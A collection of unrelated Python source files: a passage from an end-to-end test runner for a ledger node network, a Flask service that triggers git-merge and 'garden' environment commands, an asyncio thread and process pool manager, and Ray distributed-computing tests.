"***** Shutting down test due to failure!. Debug YAML: {} *****\n".format(test_yaml))
test_instance.stop()
# test_instance.dump_debug()
os._exit(1)
watchdog = TimerWatchdog(
time=max_test_time,
name=test_name,
task="End test and cleanup",
callback=clean_shutdown)
watchdog.start()
test_instance._watchdog = watchdog
# This shouldn't take a long time since nodes are started asynchronously
test_instance.run()
def send_txs(parameters, test_instance):
name = parameters["name"]
amount = parameters["amount"]
nodes = parameters["nodes"]
if len(nodes) != 1:
output("Only one node supported for sending TXs to at this time!")
sys.exit(1)
# Create or load the identities up front
identities = []
if "load_from_file" in parameters and parameters["load_from_file"] == True:
filename = "{}/identities_pickled/{}.pickle".format(
test_instance._test_files_dir, name)
verify_file(filename)
with open(filename, 'rb') as handle:
identities = pickle.load(handle)
else:
identities = [Entity() for i in range(amount)]
# If pickling, save this to the workspace
with open('{}/{}.pickle'.format(test_instance._workspace, name), 'wb') as handle:
pickle.dump(identities, handle)
for node_index in nodes:
node_host = "localhost"
node_port = test_instance._nodes[node_index]._port_start
# create the API objects we use to interface with the nodes
api = LedgerApi(node_host, node_port)
tx_and_identity = []
for index in range(amount):
# get next identity
identity = identities[index]
# create and send the transaction to the ledger, capturing the tx
# hash
tx = api.tokens.wealth(identity, index)
tx_and_identity.append((tx, identity, index))
output("Created wealth with balance: ", index)
# Attach this to the test instance so it can be used for verification
test_instance._metadata = tx_and_identity
# Save the metatada too
with open('{}/{}_meta.pickle'.format(test_instance._workspace, name), 'wb') as handle:
pickle.dump(test_instance._metadata, handle)
def run_python_test(parameters, test_instance):
host = parameters.get('host', 'localhost')
port = parameters.get('port', test_instance._nodes[0]._port_start)
test_script = importlib.import_module(
parameters['script'], 'end_to_end_test')
test_script.run({
'host': host,
'port': port
})
def verify_txs(parameters, test_instance):
name = parameters["name"]
nodes = parameters["nodes"]
expect_mined = False
try:
expect_mined = parameters["expect_mined"]
except:
pass
# Currently assume there only one set of TXs
tx_and_identity = test_instance._metadata
# Load these from file if specified
if "load_from_file" in parameters and parameters["load_from_file"] == True:
filename = "{}/identities_pickled/{}_meta.pickle".format(
test_instance._test_files_dir, name)
verify_file(filename)
with open(filename, 'rb') as handle:
tx_and_identity = pickle.load(handle)
for node_index in nodes:
node_host = "localhost"
node_port = test_instance._nodes[node_index]._port_start
api = LedgerApi(node_host, node_port)
# Verify TXs - will block until they have executed
for tx, identity, balance in tx_and_identity:
error_message = ""
# Check TX has executed, unless we expect it should already have been mined
while True:
status = api.tx.status(tx)
if status == "Executed" or expect_mined:
output("found executed TX")
error_message = ""
break
tx_b64 = codecs.encode(codecs.decode(
tx, 'hex'), 'base64').decode()
next_error_message = "Waiting for TX to get executed (node {}). Found: {} Tx: {}".format(
node_index, status, tx_b64)
time.sleep(0.5)
if next_error_message != error_message:
output(next_error_message)
error_message = next_error_message
failed_to_find = 0
while True:
seen_balance = api.tokens.balance(identity)
# There is an unavoidable race that can cause you to see a balance of 0
# since the TX can be lost even after supposedly being executed.
if seen_balance == 0 and balance is not 0:
output(
f"Note: found a balance of 0 when expecting {balance}. Retrying.")
time.sleep(1)
failed_to_find = failed_to_find + 1
if failed_to_find > 5:
# Forces the resubmission of wealth TX to the chain (TX most likely was lost)
api.tokens.wealth(identity, balance)
failed_to_find = 0
else:
# Non-zero balance at this point. Stop waiting.
if balance != seen_balance:
output(
"Balance mismatch found after sending to node. Found {} expected {}".format(
seen_balance, balance))
test_instance._watchdog.trigger()
break
output("Verified a wealth of {}".format(seen_balance))
output("Verified balances for node: {}".format(node_index))
def get_nodes_private_key(test_instance, index):
# Path to config files (should already be generated)
expected_ouptut_dir = os.path.abspath(
os.path.dirname(test_instance._yaml_file)+"/input_files")
key_path = expected_ouptut_dir+"/{}.key".format(index)
verify_file(key_path)
private_key = open(key_path, "rb").read(32)
return private_key
def destake(parameters, test_instance):
nodes = parameters["nodes"]
for node_index in nodes:
node_host = "localhost"
node_port = test_instance._nodes[node_index]._port_start
# create the API objects we use to interface with the nodes
api = LedgerApi(node_host, node_port)
# create the entity from the node's private key
entity = Entity(get_nodes_private_key(test_instance, node_index))
current_stake = api.tokens.stake(entity)
output(f'Destaking node {node_index}. Current stake: ', current_stake)
output(
f'Destaking node {node_index}. Current balance: ', api.tokens.balance(entity))
api.sync(api.tokens.add_stake(entity, 1, 500))
api.sync(api.tokens.de_stake(entity, current_stake, 500))
api.sync(api.tokens.collect_stake(entity, 500))
output(f'Destaked node {node_index}. Current stake: ', current_stake)
output(
f'Destaked node {node_index}. Current balance: ', api.tokens.balance(entity))
output(f'Destaked node {node_index}. Current cooldown stake: ',
api.tokens.stake_cooldown(entity))
def restart_nodes(parameters, test_instance):
nodes = parameters["nodes"]
for node_index in nodes:
test_instance.restart_node(node_index)
time.sleep(5)
def add_node(parameters, test_instance):
index = parameters["index"]
node_connections = parameters["node_connections"]
test_instance.append_node(index)
test_instance.connect_nodes(node_connections)
test_instance.start_node(index)
def run_steps(test_yaml, test_instance):
output("Running steps: {}".format(test_yaml))
for step in test_yaml:
output("Running step: {}".format(step))
command = ""
parameters = ""
if isinstance(step, dict):
command = list(step.keys())[0]
parameters = step[command]
elif isinstance(step, str):
command = step
else:
raise RuntimeError(
"Failed to parse command from step: {}".format(step))
if command == 'send_txs':
send_txs(parameters, test_instance)
elif command == 'verify_txs':
verify_txs(parameters, test_instance)
elif command == 'add_node':
add_node(parameters, test_instance)
elif command == 'sleep':
time.sleep(parameters)
elif command == 'print_time_elapsed':
test_instance.print_time_elapsed()
elif command == 'run_python_test':
run_python_test(parameters, test_instance)
elif command == 'restart_nodes':
restart_nodes(parameters, test_instance)
elif command == 'destake':
destake(parameters, test_instance)
else:
output(
"Found unknown command when running steps: '{}'".format(
command))
sys.exit(1)
def run_test(build_directory, yaml_file, constellation_exe):
# Read YAML file
with open(yaml_file, 'r') as stream:
try:
all_yaml = yaml.safe_load_all(stream)
# Parse yaml documents as tests (sequentially)
for test in all_yaml:
# Create a new test instance
description = extract(test, 'test_description')
output("\n=================================================")
output("Test: {}".format(description))
output("=================================================\n")
if "DISABLED" in description:
output("Skipping disabled test")
continue
# Create a test instance
test_instance = TestInstance(
build_directory, constellation_exe, yaml_file)
# Configure the test - this will start the nodes asynchronously
setup_test(extract(test, 'setup_conditions'), test_instance)
# Run the steps in the test
run_steps(extract(test, 'steps'), test_instance)
test_instance.stop()
except Exception as e:
print('Failed to parse yaml or to run test! Error: "{}"'.format(e))
traceback.print_exc()
test_instance.stop()
# test_instance.dump_debug()
sys.exit(1)
output("\nAll end to end tests have passed")
def parse_commandline():
parser = argparse.ArgumentParser(
description='High level end to end tests reads a yaml file, and runs the tests within. Returns 1 if failed')
# Required argument
parser.add_argument(
'build_directory', type=str,
help='Location of the build directory relative to current path')
parser.add_argument(
'constellation_exe', type=str,
help='Location of the constellation binary relative to current path')
parser.add_argument('yaml_file', type=str,
help='Location of the yaml file dictating the tests')
return parser.parse_args()
def main():
args = parse_commandline()
return run_test(args.build_directory, args.yaml_file,
args.constellation_exe)
if __name__ == '__main__':
main()
|
app.py
|
import json
import logging
import subprocess
import os
import sys
import urllib.parse
from flask import abort, Flask, jsonify, request, Response
from flask_cors import CORS, cross_origin
from logging.config import dictConfig
from threading import Thread
dictConfig({
'version': 1,
'formatters': {'default': {
'format': '[%(asctime)s] %(levelname)s in %(module)s: %(message)s',
}},
'handlers': {'wsgi': {
'class': 'logging.StreamHandler',
'stream': 'ext://flask.logging.wsgi_errors_stream',
'formatter': 'default'
}},
'root': {
'level': 'DEBUG',
'handlers': ['wsgi']
}
})
app = Flask(__name__)
cors = CORS(app)
# app.config['CORS_HEADERS'] = 'Content-Type'
@app.route('/')
def root():
return 'ok'
@app.route('/_ok')
def healthcheck():
return 'ok'
## TODO is POST supported by jupyter-server-proxy
# @app.route('/autocommit', methods=['POST'])
# def autocommit():
# os.chdir('/home/jovyan')
# subprocess.call(['./autocommit.sh'])
# return 'ok'
# @app.route('/merge', methods=['POST'])
# def merge():
# data = request.json()
# commit_message = data['commit_message']
# app.logger.info('/merge called with commit message: %s', commit_message)
# subprocess.Popen(['/bin/bash', '-i', '-c', '/home/jovyan/merge.sh', '"{}"'.format(commit_message)],
# cwd='/home/jovyan',
# stdout=subprocess.PIPE,
# stderr=subprocess.PIPE
# )
# return 'ok'
@app.route('/merge', methods=['GET'])
def merge():
commit_message = urllib.parse.unquote(request.args.get('commit_message'))
app.logger.info('/merge called with commit message: %s', commit_message)
subprocess.Popen(['sudo', '-i', '-u', 'jovyan', 'merge.sh', commit_message],
cwd='/home/jovyan',
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
return 'ok'
has_garden_started = False
messages = []
has_garden_deleted = False
@app.route('/garden-status', methods=['GET'])
@cross_origin()
def garden_status():
return jsonify({
'ready': has_garden_started,
'messages': messages
})
@app.route('/garden-delete-status', methods=['GET'])
@cross_origin()
def garden_delete_status():
return jsonify({
'ready': has_garden_deleted,
'messages': messages
})
@app.route('/delete-garden', methods=['GET'])
@cross_origin
def delete_garden():
app.logger.info('/delete-garden called')
repo_name = urllib.parse.unquote(request.args.get('repo_name'))
os.environ['REPO_NAME'] = repo_name;
p = subprocess.Popen(['/root/.garden/bin/garden', 'delete', 'environment', '--logger-type=json'],
cwd='/home/jovyan/work',
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
global has_garden_deleted
global messages
has_garden_deleted = False
messages = []
def do_work():
global has_garden_deleted
while p.poll() is None:
try:
line = p.stdout.readline()
line = line.decode(sys.stdout.encoding).strip('\x00')
app.logger.debug(line)
r = json.loads(line)
messages.append(r)
if r['msg'] == 'Deleting namespaces':
has_garden_deleted = True
break
except:
app.logger.error('Unexpected error: %s', sys.exc_info()[0])
thread = Thread(target=do_work)
thread.start()
return 'ok'
# method must be GET when using SSE
@app.route('/stop-garden', methods=['GET'])
@cross_origin()
def stop_garden():
app.logger.info('/stop-garden called')
repo_name = urllib.parse.unquote(request.args.get('repo_name'))
os.environ['REPO_NAME'] = repo_name;
p = subprocess.Popen(['/root/.garden/bin/garden', 'delete', 'environment', '--logger-type=json'],
cwd='/home/jovyan/work',
# have it covered in supervisord config, otherwise need this
# for garden/kubectl to find the kube config
# env={
# 'USER': 'root',
# 'HOME': '/root',
# 'KUBECONFIG': '/root/.kube/config'
# }
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
global has_garden_deleted
global messages
has_garden_deleted = False
messages = []
def do_delete():
global has_garden_deleted
while p.poll() is None:
try:
line = p.stdout.readline()
line = line.decode(sys.stdout.encoding).strip('\x00')
app.logger.debug(line)
r = json.loads(line)
messages.append(r)
msg = r.get('msg', None)
if msg is not None:
m = msg.lower()
if 'aborting' in m:
# raise Exception('No enabled modules found in project.')
raise Exception(messages[-2])
elif 'deleting namespaces' in m:
has_garden_deleted = True
break
except:
app.logger.error('Unexpected error: %s', sys.exc_info()[0])
thread = Thread(target=do_delete)
thread.start()
return 'ok'
# method must be GET when using SSE
@app.route('/start-garden', methods=['GET'])
@cross_origin()
def start_garden():
app.logger.info('/start-garden called')
repo_name = urllib.parse.unquote(request.args.get('repo_name'))
os.environ['REPO_NAME'] = repo_name;
p = subprocess.Popen(['/root/.garden/bin/garden', 'dev', '--logger-type=json'],
cwd='/home/jovyan/work',
# have it covered in supervisord config, otherwise need this
# for garden/kubectl to find the kube config
# env={
# 'USER': 'root',
# 'HOME': '/root',
# 'KUBECONFIG': '/root/.kube/config'
# }
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
global has_garden_started
global messages
has_garden_started = False
messages = []
def do_work():
global has_garden_started
while p.poll() is None:
try:
line = p.stdout.readline()
line = line.decode(sys.stdout.encoding).strip('\x00')
app.logger.debug(line)
r = json.loads(line)
messages.append(r)
msg = r.get('msg', None)
if msg is not None:
m = msg.lower()
if 'aborting' in m:
# raise Exception('No enabled modules found in project.')
raise Exception(messages[-2])
elif 'waiting for code changes' in m:
has_garden_started = True
break
except:
app.logger.error('Unexpected error: %s', sys.exc_info()[0])
thread = Thread(target=do_work)
thread.start()
return 'ok'
# TODO
# def event_stream():
# while p.poll() is None:
# line = p.stdout.readline()
# line = line.decode(sys.stdout.encoding).strip('\x00')
# app.logger.debug(line)
# yield 'data: {}\n\n'.format(line)
# return Response(event_stream(), mimetype='text/event-stream', headers={
# 'Content-Type': 'text/event-stream',
# 'Cache-Control': 'no-cache',
# 'X-Accel-Buffering': 'no'
# })
|
process_threads_and_tasks_autoscale.py
|
# -*- coding: utf-8 -*-
#
# Author: Daniel Garcia (cr0hn) - @ggdaniel
#
import aiohttp
import asyncio
import random
from threading import Thread, Event, BoundedSemaphore, currentThread
from multiprocessing import Process
class ConcurrentManager:
def __init__(self, n_process=2, n_threads=5, n_taks=10, daemon=False):
self.daemon = daemon
self.n_taks = n_taks
self.n_threads = n_threads
self.n_process = n_process
self.sem_threads = BoundedSemaphore(self.n_threads)
self.sem_tasks = asyncio.BoundedSemaphore(self.n_taks)
self.running_process = []
# --------------------------------------------------------------------------
# Public methods
# --------------------------------------------------------------------------
def run(self):
self._launch_processes()
def wait_until_complete(self):
try:
for x in self.running_process:
x.join()
except KeyboardInterrupt:
print("\n[*] CTRL+C Caught. ...")
for x in self.running_process:
x.terminate()
@asyncio.coroutine
def task(self, t, e):
"""
A task
:param e: Event obj
:type e: Event
"""
# if not e.isSet():
# for x in range(100):
#
# with aiohttp.ClientSession() as session:
# res = yield from session.get('https://api.github.com/events')
#
# print(res.status)
#
# # body = yield from res.text()
#
# yield from asyncio.sleep(1)
for x in range(200):
print(t, " - ", currentThread().name, " - task-%s" % random.randint(1, 100000))
yield from asyncio.sleep(0.5)
# Thread _launch_tasks
def worker(self, name, state, sem):
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
try:
loop.run_until_complete(self._launch_coroutines(loop, name, state))
except KeyboardInterrupt:
# Canceling tasks
tasks = asyncio.Task.all_tasks()
map(asyncio.Task.cancel, tasks)
loop.run_forever()
tasks.exception()
finally:
loop.close()
sem.release()
# --------------------------------------------------------------------------
# Private launchers
# --------------------------------------------------------------------------
# Thread pool
def _launch_threads(self, proc_number):
state = Event()
th = []
try:
while True:
if state.isSet():
break
n = "proc-%s" % proc_number
t = Thread(target=self.worker, args=(n, state, self.sem_threads, ))
th.append(t)
# t.daemon = True
t.start()
self.sem_threads.acquire()
for t in th:
t.join()
except KeyboardInterrupt:
# print("\n[*] CTRL+C Caught. Exiting threads form process '%s'..." % proc_number)
pass
finally:
state.set()
# Process pool
def _launch_processes(self):
try:
for i in range(self.n_process):
p = Process(target=self._launch_threads, args=(i,))
if self.daemon is True:
p.daemon = True
self.running_process.append(p)
p.start()
if self.daemon is False:
for x in self.running_process:
x.join()
except KeyboardInterrupt:
for x in self.running_process:
x.terminate()
@asyncio.coroutine
def _launch_coroutines(self, loop, name, state):
while True:
if state.isSet():
break
yield from self.sem_tasks.acquire()
loop.create_task(self.task(name, state))
# Tasks pool
@asyncio.coroutine
def _launch_coroutines(self, loop, name, state):
while True:
if state.isSet():
break
yield from self.sem_tasks.acquire()
loop.create_task(self.task(name, state))
# --------------------------------------------------------------------------
# Scalability methods
# --------------------------------------------------------------------------
@property
def threads_num(self):
"""
:return: Return the current active threads
:rtype: int
"""
return self.sem_threads._value
def threads_inc(self, n):
"""
Increases the thread pool in 'n'.
:param n: number which increment the thread pool
:type n: int
"""
self.sem_threads._value += n
if self.sem_threads._value < self.sem_threads._initial_value:
self.sem_threads.release()
def threads_dec(self, n):
"""
Decreases the threads number in 'n'
:param n: number which decrement the thread pool
:type n: int
"""
if n > 0:
if self.sem_threads._value - n > 1:
self.sem_threads._value -= n
@property
def tasks_num(self):
"""
:return: Return the current active asyncio tasks
:rtype: int
"""
return self.sem_tasks._value
def tasks_inc(self, n):
"""
Increases the asyncio tasks pool in 'n'.
:param n: number which increment the asyncio Task pool
:type n: int
"""
self.sem_tasks._value += n
if self.sem_tasks._value < self.sem_tasks._bound_value:
self.sem_tasks.release()
def tasks_dec(self, n):
"""
Decreases the asyncio Tasks number in 'n'
:param n: number which decrement the tasks pool
:type n: int
"""
if n > 0:
if self.sem_tasks._value - n > 1:
self.sem_tasks._value -= n
if __name__ == '__main__':
#
# This code build this process-> threads-> asyncio tasks distribution:
#
# run_monitor -> Process 1 -> Thread 1.1 -> Task 1.1.1
# -> Task 1.1.2
# -> Task 1.1.3
#
# -> Thread 1.2
# -> Task 1.2.1
# -> Task 1.2.2
# -> Task 1.2.3
#
# Process 2 -> Thread 2.1 -> Task 2.1.1
# -> Task 2.1.2
# -> Task 2.1.3
#
# -> Thread 2.2
# -> Task 2.2.1
# -> Task 2.2.2
# -> Task 2.2.3
import time
# c = ConcurrentManager(n_process=1, n_taks=2, n_threads=2, daemon=True)
c = ConcurrentManager(n_process=4, n_taks=20, n_threads=10)
c.run()
# time.sleep(1)
#
# print("Incrementing", "#" * 200)
# c.threads_inc(4)
#
# # time.sleep(2)
#
# c.tasks_inc(5)
# c.wait_until_complete()
|
test_advanced.py
|
# coding: utf-8
from concurrent.futures import ThreadPoolExecutor
import json
import logging
import random
import sys
import threading
import time
import numpy as np
import pytest
import ray
import ray.cluster_utils
import ray.test_utils
from ray.test_utils import RayTestTimeoutException
logger = logging.getLogger(__name__)
# issue https://github.com/ray-project/ray/issues/7105
def test_internal_free(shutdown_only):
ray.init(num_cpus=1)
@ray.remote
class Sampler:
def sample(self):
return [1, 2, 3, 4, 5]
def sample_big(self):
return np.zeros(1024 * 1024)
sampler = Sampler.remote()
# Free deletes from in-memory store.
obj_ref = sampler.sample.remote()
ray.get(obj_ref)
ray.internal.free(obj_ref)
with pytest.raises(Exception):
ray.get(obj_ref)
# Free deletes big objects from plasma store.
big_id = sampler.sample_big.remote()
ray.get(big_id)
ray.internal.free(big_id)
time.sleep(1) # wait for delete RPC to propagate
with pytest.raises(Exception):
ray.get(big_id)
def test_wait_iterables(ray_start_regular):
@ray.remote
def f(delay):
time.sleep(delay)
return 1
object_refs = (f.remote(1.0), f.remote(0.5), f.remote(0.5), f.remote(0.5))
ready_ids, remaining_ids = ray.experimental.wait(object_refs)
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
object_refs = np.array(
[f.remote(1.0),
f.remote(0.5),
f.remote(0.5),
f.remote(0.5)])
ready_ids, remaining_ids = ray.experimental.wait(object_refs)
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
def test_multiple_waits_and_gets(shutdown_only):
# It is important to use three workers here, so that the three tasks
# launched in this experiment can run at the same time.
ray.init(num_cpus=3)
@ray.remote
def f(delay):
time.sleep(delay)
return 1
@ray.remote
def g(l):
# The argument l should be a list containing one object ref.
ray.wait([l[0]])
@ray.remote
def h(l):
# The argument l should be a list containing one object ref.
ray.get(l[0])
# Make sure that multiple wait requests involving the same object ref
# all return.
x = f.remote(1)
ray.get([g.remote([x]), g.remote([x])])
# Make sure that multiple get requests involving the same object ref all
# return.
x = f.remote(1)
ray.get([h.remote([x]), h.remote([x])])
def test_caching_functions_to_run(shutdown_only):
# Test that we export functions to run on all workers before the driver
# is connected.
def f(worker_info):
sys.path.append(1)
ray.worker.global_worker.run_function_on_all_workers(f)
def f(worker_info):
sys.path.append(2)
ray.worker.global_worker.run_function_on_all_workers(f)
def g(worker_info):
sys.path.append(3)
ray.worker.global_worker.run_function_on_all_workers(g)
def f(worker_info):
sys.path.append(4)
ray.worker.global_worker.run_function_on_all_workers(f)
ray.init(num_cpus=1)
@ray.remote
def get_state():
time.sleep(1)
return sys.path[-4], sys.path[-3], sys.path[-2], sys.path[-1]
res1 = get_state.remote()
res2 = get_state.remote()
assert ray.get(res1) == (1, 2, 3, 4)
assert ray.get(res2) == (1, 2, 3, 4)
# Clean up the path on the workers.
def f(worker_info):
sys.path.pop()
sys.path.pop()
sys.path.pop()
sys.path.pop()
ray.worker.global_worker.run_function_on_all_workers(f)
def test_running_function_on_all_workers(ray_start_regular):
def f(worker_info):
sys.path.append("fake_directory")
ray.worker.global_worker.run_function_on_all_workers(f)
@ray.remote
def get_path1():
return sys.path
assert "fake_directory" == ray.get(get_path1.remote())[-1]
def f(worker_info):
sys.path.pop(-1)
ray.worker.global_worker.run_function_on_all_workers(f)
# Create a second remote function to guarantee that when we call
# get_path2.remote(), the second function to run will have been run on
# the worker.
@ray.remote
def get_path2():
return sys.path
assert "fake_directory" not in ray.get(get_path2.remote())
def test_profiling_api(ray_start_2_cpus):
@ray.remote
def f():
with ray.profile("custom_event", extra_data={"name": "custom name"}):
pass
ray.put(1)
object_ref = f.remote()
ray.wait([object_ref])
ray.get(object_ref)
# Wait until all of the profiling information appears in the profile
# table.
timeout_seconds = 20
start_time = time.time()
while True:
profile_data = ray.timeline()
event_types = {event["cat"] for event in profile_data}
expected_types = [
"task",
"task:deserialize_arguments",
"task:execute",
"task:store_outputs",
"wait_for_function",
"ray.get",
"ray.put",
"ray.wait",
"submit_task",
"fetch_and_run_function",
"register_remote_function",
"custom_event", # This is the custom one from ray.profile.
]
if all(expected_type in event_types
for expected_type in expected_types):
break
if time.time() - start_time > timeout_seconds:
raise RayTestTimeoutException(
"Timed out while waiting for information in "
"profile table. Missing events: {}.".format(
set(expected_types) - set(event_types)))
# The profiling information only flushes once every second.
time.sleep(1.1)
def test_wait_cluster(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(num_cpus=1, resources={"RemoteResource": 1})
cluster.add_node(num_cpus=1, resources={"RemoteResource": 1})
ray.init(address=cluster.address)
@ray.remote(resources={"RemoteResource": 1})
def f():
return
# Make sure we have enough workers on the remote nodes to execute some
# tasks.
tasks = [f.remote() for _ in range(10)]
start = time.time()
ray.get(tasks)
end = time.time()
# Submit some more tasks that can only be executed on the remote nodes.
tasks = [f.remote() for _ in range(10)]
# Sleep for a bit to let the tasks finish.
time.sleep((end - start) * 2)
_, unready = ray.wait(tasks, num_returns=len(tasks), timeout=0)
# All remote tasks should have finished.
assert len(unready) == 0
@pytest.mark.skip(reason="TODO(ekl)")
def test_object_transfer_dump(ray_start_cluster):
cluster = ray_start_cluster
num_nodes = 3
for i in range(num_nodes):
cluster.add_node(resources={str(i): 1}, object_store_memory=10**9)
ray.init(address=cluster.address)
@ray.remote
def f(x):
return
# These objects will live on different nodes.
object_refs = [
f._remote(args=[1], resources={str(i): 1}) for i in range(num_nodes)
]
# Broadcast each object from each machine to each other machine.
for object_ref in object_refs:
ray.get([
f._remote(args=[object_ref], resources={str(i): 1})
for i in range(num_nodes)
])
# The profiling information only flushes once every second.
time.sleep(1.1)
transfer_dump = ray.object_transfer_timeline()
# Make sure the transfer dump can be serialized with JSON.
json.loads(json.dumps(transfer_dump))
assert len(transfer_dump) >= num_nodes**2
assert len({
event["pid"]
for event in transfer_dump if event["name"] == "transfer_receive"
}) == num_nodes
assert len({
event["pid"]
for event in transfer_dump if event["name"] == "transfer_send"
}) == num_nodes
def test_identical_function_names(ray_start_regular):
# Define a bunch of remote functions and make sure that we don't
# accidentally call an older version.
num_calls = 200
@ray.remote
def f():
return 1
results1 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 2
results2 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 3
results3 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 4
results4 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 5
results5 = [f.remote() for _ in range(num_calls)]
assert ray.get(results1) == num_calls * [1]
assert ray.get(results2) == num_calls * [2]
assert ray.get(results3) == num_calls * [3]
assert ray.get(results4) == num_calls * [4]
assert ray.get(results5) == num_calls * [5]
@ray.remote
def g():
return 1
@ray.remote # noqa: F811
def g(): # noqa: F811
return 2
@ray.remote # noqa: F811
def g(): # noqa: F811
return 3
@ray.remote # noqa: F811
def g(): # noqa: F811
return 4
@ray.remote # noqa: F811
def g(): # noqa: F811
return 5
result_values = ray.get([g.remote() for _ in range(num_calls)])
assert result_values == num_calls * [5]
def test_illegal_api_calls(ray_start_regular):
# Verify that we cannot call put on an ObjectRef.
x = ray.put(1)
with pytest.raises(Exception):
ray.put(x)
# Verify that we cannot call get on a regular value.
with pytest.raises(Exception):
ray.get(3)
def test_multithreading(ray_start_2_cpus):
# This test requires at least 2 CPUs to finish since the worker does not
# release resources when joining the threads.
def run_test_in_multi_threads(test_case, num_threads=10, num_repeats=25):
"""A helper function that runs test cases in multiple threads."""
def wrapper():
for _ in range(num_repeats):
test_case()
time.sleep(random.randint(0, 10) / 1000.0)
return "ok"
executor = ThreadPoolExecutor(max_workers=num_threads)
futures = [executor.submit(wrapper) for _ in range(num_threads)]
for future in futures:
assert future.result() == "ok"
@ray.remote
def echo(value, delay_ms=0):
if delay_ms > 0:
time.sleep(delay_ms / 1000.0)
return value
def test_api_in_multi_threads():
"""Test using Ray api in multiple threads."""
@ray.remote
class Echo:
def echo(self, value):
return value
# Test calling remote functions in multiple threads.
def test_remote_call():
value = random.randint(0, 1000000)
result = ray.get(echo.remote(value))
assert value == result
run_test_in_multi_threads(test_remote_call)
# Test multiple threads calling one actor.
actor = Echo.remote()
def test_call_actor():
value = random.randint(0, 1000000)
result = ray.get(actor.echo.remote(value))
assert value == result
run_test_in_multi_threads(test_call_actor)
# Test put and get.
def test_put_and_get():
value = random.randint(0, 1000000)
result = ray.get(ray.put(value))
assert value == result
run_test_in_multi_threads(test_put_and_get)
# Test multiple threads waiting for objects.
num_wait_objects = 10
objects = [
echo.remote(i, delay_ms=10) for i in range(num_wait_objects)
]
def test_wait():
ready, _ = ray.wait(
objects,
num_returns=len(objects),
timeout=1000.0,
)
assert len(ready) == num_wait_objects
assert ray.get(ready) == list(range(num_wait_objects))
run_test_in_multi_threads(test_wait, num_repeats=1)
# Run tests in a driver.
test_api_in_multi_threads()
# Run tests in a worker.
@ray.remote
def run_tests_in_worker():
test_api_in_multi_threads()
return "ok"
assert ray.get(run_tests_in_worker.remote()) == "ok"
# Test actor that runs background threads.
@ray.remote
class MultithreadedActor:
def __init__(self):
self.lock = threading.Lock()
self.thread_results = []
def background_thread(self, wait_objects):
try:
# Test wait
ready, _ = ray.wait(
wait_objects,
num_returns=len(wait_objects),
timeout=1000.0,
)
assert len(ready) == len(wait_objects)
for _ in range(20):
num = 10
# Test remote call
results = [echo.remote(i) for i in range(num)]
assert ray.get(results) == list(range(num))
# Test put and get
objects = [ray.put(i) for i in range(num)]
assert ray.get(objects) == list(range(num))
time.sleep(random.randint(0, 10) / 1000.0)
except Exception as e:
with self.lock:
self.thread_results.append(e)
else:
with self.lock:
self.thread_results.append("ok")
def spawn(self):
wait_objects = [echo.remote(i, delay_ms=10) for i in range(10)]
self.threads = [
threading.Thread(
target=self.background_thread, args=(wait_objects, ))
for _ in range(20)
]
[thread.start() for thread in self.threads]
def join(self):
[thread.join() for thread in self.threads]
assert self.thread_results == ["ok"] * len(self.threads)
return "ok"
actor = MultithreadedActor.remote()
actor.spawn.remote()
ray.get(actor.join.remote()) == "ok"
def test_wait_makes_object_local(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(num_cpus=0)
cluster.add_node(num_cpus=2)
ray.init(address=cluster.address)
@ray.remote
class Foo:
def method(self):
return np.zeros(1024 * 1024)
a = Foo.remote()
# Test get makes the object local.
x_id = a.method.remote()
assert not ray.worker.global_worker.core_worker.object_exists(x_id)
ray.get(x_id)
assert ray.worker.global_worker.core_worker.object_exists(x_id)
# Test wait makes the object local.
x_id = a.method.remote()
assert not ray.worker.global_worker.core_worker.object_exists(x_id)
ok, _ = ray.wait([x_id])
assert len(ok) == 1
assert ray.worker.global_worker.core_worker.object_exists(x_id)
if __name__ == "__main__":
import pytest
sys.exit(pytest.main(["-v", __file__]))
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.